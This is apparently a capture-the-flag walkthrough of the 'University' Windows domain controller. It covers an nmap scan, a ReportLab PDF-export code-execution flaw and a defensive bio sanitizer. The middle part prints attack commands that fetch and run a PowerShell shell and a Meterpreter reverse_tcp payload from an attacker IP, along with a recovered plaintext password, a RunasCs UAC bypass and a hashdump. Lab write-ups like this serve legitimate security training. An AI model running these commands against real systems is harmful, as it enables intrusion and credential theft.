Basic information

Port scan

Port 80 plus the usual domain-controller ports:

```
$ nmap -sC -sV -Pn 10.10.11.39
Starting Nmap 7.95 ( https://nmap.org ) at 2024-10-28 13:32 CST
Nmap scan report for 10.10.11.39
Host is up (0.076s latency).
Not shown: 986 closed tcp ports (conn-refused)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          nginx 1.24.0
|_http-server-header: nginx/1.24.0
|_http-title: Did not follow redirect to http://university.htb/
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-10-28 12:20:26Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: university.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
2179/tcp open  vmrdp?
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: university.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2024-10-28T12:20:47
|_  start_date: N/A
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
|_clock-skew: 6h47m38s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 67.17 seconds
```

80

A hosts entry is needed:

```
10.10.11.39 university.htb
```

It is an online-education site:

university

Registration offers two account types; professor accounts need approval, so a student account is registered first for testing:

profile export

There is a "profile export" option in the top-right corner that exports the profile as a PDF; inspecting the file shows it was generated with ReportLab:

ReportLab

A quick search turns up a known ReportLab vulnerability:

To test it, update the profile with the payload placed in the BIO field, then export; the export triggers command execution:

reverse shell
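The root cause above is user-controlled profile text reaching ReportLab's rich-text parser. As an added defender-side illustration (not the University application's code), the helper below escapes the bio before it is passed to a `reportlab.platypus.Paragraph` and records an audit line whenever markup shows up in a field that should only ever hold plain text; the function and log names are assumptions.

```python
import html
import re

# Any XML/HTML-style tag; a plain-text profile bio should never contain one.
ANY_TAG = re.compile(r"<[^>]+>")


def bio_has_markup(raw: str) -> bool:
    """True if the submitted bio contains any tag-like construct."""
    return ANY_TAG.search(raw) is not None


def sanitize_bio(raw: str, max_len: int = 2000) -> str:
    """Return bio text that is safe to hand to reportlab.platypus.Paragraph.

    Paragraph parses its input as XML-like markup, so '<', '>', '&' and
    quotes are converted to entities; ReportLab then renders the user's
    text literally instead of interpreting it.  The length cap keeps the
    export from being used to inflate the PDF.
    """
    return html.escape(raw[:max_len], quote=True)


def export_bio_for_pdf(raw: str, audit_log: list) -> str:
    """Sanitize the bio and log an audit entry when markup was submitted."""
    if bio_has_markup(raw):
        # Constructed audit line; wire this into the real logging pipeline
        # so attempts to feed markup into the PDF export are visible.
        audit_log.append(f"profile-export: markup in bio field: {raw[:80]!r}")
    return sanitize_bio(raw)
```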

A simple shell, run in two steps, gives the wao user:

```
curl http://10.10.14.9:7777/shell.ps1 -o shell.ps1
powershell ./shell.ps1
```

WAO

Routine file browsing then turns up the wao user's password in db-backup-automator.ps1:

```
WebAO1337
```

The recovered wao credentials are then used to get a UAC-bypassed shell:

```
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.9 LPORT=4444 -f exe -o miao.exe

curl http://10.10.14.9:7777/miao.exe -o miao.exe
curl http://10.10.14.9:7777/RunasCs.exe -o RunasCs.exe

.\RunasCs.exe wao WebAO1337 miao.exe -l 5 --bypass-uac
```

Unintended privilege escalation & flags

The wao user holds SeImpersonatePrivilege, so getsystem works directly:

The user flag is on John.D's desktop.

hashdump

```
meterpreter > hashdump
```

References